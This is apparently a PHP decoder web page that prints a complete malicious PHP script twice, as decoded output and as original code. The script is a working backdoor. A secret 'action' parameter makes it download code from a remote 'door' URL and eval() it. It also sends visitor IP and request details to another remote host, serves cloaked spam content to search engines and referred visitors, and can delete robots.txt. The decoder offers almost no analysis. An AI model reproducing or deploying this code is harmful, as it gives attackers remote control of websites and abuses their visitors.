Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php header(\'Content-Type: text/html; charset=utf-8\'); @set_time_limit(600);@error_repo..

Decoded Output download

<?php header(\'Content-Type: text/html; charset=utf-8\'); @set_time_limit(600);@error_reporting(0);@ignore_user_abort(1);ini_set(\'display_errors\',\'Off\');$a=!empty($_SERVER[\'HTTPS\'])&&strtolower($_SERVER[\'HTTPS\'])!==\'off\'||isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\'])&&$_SERVER[\'HTTP_X_FORWARDED_PROTO\']===\'https\'||!empty($_SERVER[\'HTTP_FRONT_END_HTTPS\'])&&strtolower($_SERVER[\'HTTP_FRONT_END_HTTPS\'])!==\'off\'?"https":"http";$b=$_SERVER["REQUEST_URI"];$c=isset($_SERVER[\'HTTP_ACCEPT_LANGUAGE\'])?$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']:"";$d=$_SERVER["HTTP_HOST"];$f=isset($_SERVER[\'HTTP_REFERER\'])?$_SERVER[\'HTTP_REFERER\']:"";$g=isset($_SERVER[\'HTTP_USER_AGENT\'])?$_SERVER[\'HTTP_USER_AGENT\']:"";$h=isset($_SERVER[\'REMOTE_ADDR\'])?$_SERVER[\'REMOTE_ADDR\']:"";$i=array(\'Accept-Language: \'.$c,\'User-Agent: \'.$g,\'Referer: \'.$f,\'Http-Proto: \'.$a,\'Http-Host: \'.$d,\'Http-Uri: \'.$b,\'Http-X-Forwarded-For: \'.$h);$j="type=".$a."&host=".$d."&uri=".$b."&ip=".$h;$k=$_REQUEST[\'action\'];if(!empty($k)){$l=substr($k,-1);$k=substr($k,0,strlen($k)-1);$m=array(\'9\',\'8\',\'2\',\'4\',\'5\',\'d\',\'7\',\'4\',\'1\',\'7\',\'2\',\'2\',\'5\',\'b\',\'5\',\'5\',\'a\',\'2\',\'c\',\'4\',\'b\',\'f\',\'5\',\'0\',\'b\',\'8\',\'a\',\'a\',\'4\',\'c\',\'7\',\'3\');$n=md5($k);if($n==implode($m)){$o=array("h","t","t","p","s",":","/","/","v","p","s","d","d",".","d","f","q","f","a","t",".","t","o","p","/","d","o","o","r","/");$p=getu(implode($o).$l.\'.t\'.\'x\'.\'t\');eval(\'?>\'.$p[0]);}exit();}else{$q="i2jolk.iccoql.top";if($b!=="/favicon.ico"){if(strstr($b,\'testsitemap\')){$r=$_SERVER[\'DOCUMENT_ROOT\'].\'/robots.txt\';if(file_exists($r)){unlink($r);}}if(strstr($b,\'.xml\')||strstr($b,\'robots.txt\')){list($s,$t,$u)=getu(\'h\'.\'t\'.\'t\'.\'ps\'.\':/\'.\'/\'.$q.\'/in\'.\'d\'.\'ex\'.\'on\'.\'e.\'.\'ph\'.\'p?\'.$j,$i,$j);}else{if(checkReferer($f)||!checkNotBot($g)){list($s,$t,$u)=getu(\'h\'.\'t\'.\'t\'.\'ps\'.\':/\'.\'/\'.$q.\'/in\'.\'d\'.\'ex\'.\'on\'.\'e.\'.\'ph\'.\'p?\'.$j,$i,$j);}}if(isset($t)&&!empty($t)){if($t>=400&&$t<500){@header(\'HTTP/1.1 404 Not Found\');exit($s);}if($t>=500){@header(\'HTTP/1.1 500 Internal Server Error\');exit;}if(!strstr($s,\'notthing\')){if(strstr($s,\'htmlcontent\')){@header("Content-type: text/html; charset=utf-8");$v=str_replace("htmlcontent",\'\',$s);echo $v;exit();}if(strstr($s,\'xmlcontent\')){@header("Content-type: text/xml");exit(str_replace("xmlcontent",\'\',$s));}if(strstr($s,\'robotscontent\')){@header("Content-type: text/plain; charset=utf-8");$w=explode(\'[zm]\',str_replace("robotscontent",\'\',$s));exit(implode(PHP_EOL,$w));}}}}}function checkReferer($x){$x=strtolower($x);if($x!=""){$y=array("google.co.jp","google.com","yahoo.com","yahoo.co.jp","bing.com","goo.ne.jp","nifty.com");foreach($y as $z){$aa=strtolower($z);if(strstr($x,$aa)){return true;}}}else{return false;}}function checkNotBot($bb){$bb=strtolower($bb);if($bb!=""){$cc=array("AhrefsBot","Amazonbot","BLEXBot","Bytespider","ChatGPT-User","DataForSeoBot","DotBot","facebook","GPTBot","linkdexbot","MJ12bot","SemrushBot","Yandex","Twitterbot");foreach($cc as $z){$aa=strtolower($z);if(strstr($bb,$aa)){return true;}}}else{return false;}}function getu($dd,$i=null,$j=null,$ee=null){if(!function_exists(\'curl_init\')){return;}$ff="";$gg="";$hh="";try{$ii=curl_init();curl_setopt($ii,CURLOPT_URL,$dd);curl_setopt($ii,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ii,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($ii,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($ii,CURLOPT_CONNECTTIMEOUT,30);curl_setopt($ii,CURLOPT_RETURNTRANSFER,1);$i===null?\'\':curl_setopt($ii,CURLOPT_HTTPHEADER,$i);$ee===null||$ee===""?\'\':curl_setopt($ii,CURLOPT_USERAGENT,$ee);if($j!==null&&$j!==""){curl_setopt($ii,CURLOPT_POST,1);curl_setopt($ii,CURLOPT_POSTFIELDS,$j);}$ff=curl_exec($ii);$gg=curl_getinfo($ii,CURLINFO_HTTP_CODE);$hh=curl_getinfo($ii,CURLINFO_CONTENT_TYPE);curl_close($ii);}catch(Exception $jj){}if(($ff===false||$ff=="")&&function_exists(\'file_get_contents\')){try{$ff=@file_get_contents($dd);}catch(Exception $jj){}}return array($ff,$gg,$hh);} ?>'

Did this file decode correctly?

Original Code

<?php header(\'Content-Type: text/html; charset=utf-8\'); @set_time_limit(600);@error_reporting(0);@ignore_user_abort(1);ini_set(\'display_errors\',\'Off\');$a=!empty($_SERVER[\'HTTPS\'])&&strtolower($_SERVER[\'HTTPS\'])!==\'off\'||isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\'])&&$_SERVER[\'HTTP_X_FORWARDED_PROTO\']===\'https\'||!empty($_SERVER[\'HTTP_FRONT_END_HTTPS\'])&&strtolower($_SERVER[\'HTTP_FRONT_END_HTTPS\'])!==\'off\'?"https":"http";$b=$_SERVER["REQUEST_URI"];$c=isset($_SERVER[\'HTTP_ACCEPT_LANGUAGE\'])?$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']:"";$d=$_SERVER["HTTP_HOST"];$f=isset($_SERVER[\'HTTP_REFERER\'])?$_SERVER[\'HTTP_REFERER\']:"";$g=isset($_SERVER[\'HTTP_USER_AGENT\'])?$_SERVER[\'HTTP_USER_AGENT\']:"";$h=isset($_SERVER[\'REMOTE_ADDR\'])?$_SERVER[\'REMOTE_ADDR\']:"";$i=array(\'Accept-Language: \'.$c,\'User-Agent: \'.$g,\'Referer: \'.$f,\'Http-Proto: \'.$a,\'Http-Host: \'.$d,\'Http-Uri: \'.$b,\'Http-X-Forwarded-For: \'.$h);$j="type=".$a."&host=".$d."&uri=".$b."&ip=".$h;$k=$_REQUEST[\'action\'];if(!empty($k)){$l=substr($k,-1);$k=substr($k,0,strlen($k)-1);$m=array(\'9\',\'8\',\'2\',\'4\',\'5\',\'d\',\'7\',\'4\',\'1\',\'7\',\'2\',\'2\',\'5\',\'b\',\'5\',\'5\',\'a\',\'2\',\'c\',\'4\',\'b\',\'f\',\'5\',\'0\',\'b\',\'8\',\'a\',\'a\',\'4\',\'c\',\'7\',\'3\');$n=md5($k);if($n==implode($m)){$o=array("h","t","t","p","s",":","/","/","v","p","s","d","d",".","d","f","q","f","a","t",".","t","o","p","/","d","o","o","r","/");$p=getu(implode($o).$l.\'.t\'.\'x\'.\'t\');eval(\'?>\'.$p[0]);}exit();}else{$q="i2jolk.iccoql.top";if($b!=="/favicon.ico"){if(strstr($b,\'testsitemap\')){$r=$_SERVER[\'DOCUMENT_ROOT\'].\'/robots.txt\';if(file_exists($r)){unlink($r);}}if(strstr($b,\'.xml\')||strstr($b,\'robots.txt\')){list($s,$t,$u)=getu(\'h\'.\'t\'.\'t\'.\'ps\'.\':/\'.\'/\'.$q.\'/in\'.\'d\'.\'ex\'.\'on\'.\'e.\'.\'ph\'.\'p?\'.$j,$i,$j);}else{if(checkReferer($f)||!checkNotBot($g)){list($s,$t,$u)=getu(\'h\'.\'t\'.\'t\'.\'ps\'.\':/\'.\'/\'.$q.\'/in\'.\'d\'.\'ex\'.\'on\'.\'e.\'.\'ph\'.\'p?\'.$j,$i,$j);}}if(isset($t)&&!empty($t)){if($t>=400&&$t<500){@header(\'HTTP/1.1 404 Not Found\');exit($s);}if($t>=500){@header(\'HTTP/1.1 500 Internal Server Error\');exit;}if(!strstr($s,\'notthing\')){if(strstr($s,\'htmlcontent\')){@header("Content-type: text/html; charset=utf-8");$v=str_replace("htmlcontent",\'\',$s);echo $v;exit();}if(strstr($s,\'xmlcontent\')){@header("Content-type: text/xml");exit(str_replace("xmlcontent",\'\',$s));}if(strstr($s,\'robotscontent\')){@header("Content-type: text/plain; charset=utf-8");$w=explode(\'[zm]\',str_replace("robotscontent",\'\',$s));exit(implode(PHP_EOL,$w));}}}}}function checkReferer($x){$x=strtolower($x);if($x!=""){$y=array("google.co.jp","google.com","yahoo.com","yahoo.co.jp","bing.com","goo.ne.jp","nifty.com");foreach($y as $z){$aa=strtolower($z);if(strstr($x,$aa)){return true;}}}else{return false;}}function checkNotBot($bb){$bb=strtolower($bb);if($bb!=""){$cc=array("AhrefsBot","Amazonbot","BLEXBot","Bytespider","ChatGPT-User","DataForSeoBot","DotBot","facebook","GPTBot","linkdexbot","MJ12bot","SemrushBot","Yandex","Twitterbot");foreach($cc as $z){$aa=strtolower($z);if(strstr($bb,$aa)){return true;}}}else{return false;}}function getu($dd,$i=null,$j=null,$ee=null){if(!function_exists(\'curl_init\')){return;}$ff="";$gg="";$hh="";try{$ii=curl_init();curl_setopt($ii,CURLOPT_URL,$dd);curl_setopt($ii,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ii,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($ii,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($ii,CURLOPT_CONNECTTIMEOUT,30);curl_setopt($ii,CURLOPT_RETURNTRANSFER,1);$i===null?\'\':curl_setopt($ii,CURLOPT_HTTPHEADER,$i);$ee===null||$ee===""?\'\':curl_setopt($ii,CURLOPT_USERAGENT,$ee);if($j!==null&&$j!==""){curl_setopt($ii,CURLOPT_POST,1);curl_setopt($ii,CURLOPT_POSTFIELDS,$j);}$ff=curl_exec($ii);$gg=curl_getinfo($ii,CURLINFO_HTTP_CODE);$hh=curl_getinfo($ii,CURLINFO_CONTENT_TYPE);curl_close($ii);}catch(Exception $jj){}if(($ff===false||$ff=="")&&function_exists(\'file_get_contents\')){try{$ff=@file_get_contents($dd);}catch(Exception $jj){}}return array($ff,$gg,$hh);} ?>'

Function Calls

None

Variables

None

Stats

MD5 2a9fc86d7e9a06de247470c0971bcb37
Eval Count 0
Decode Time 86 ms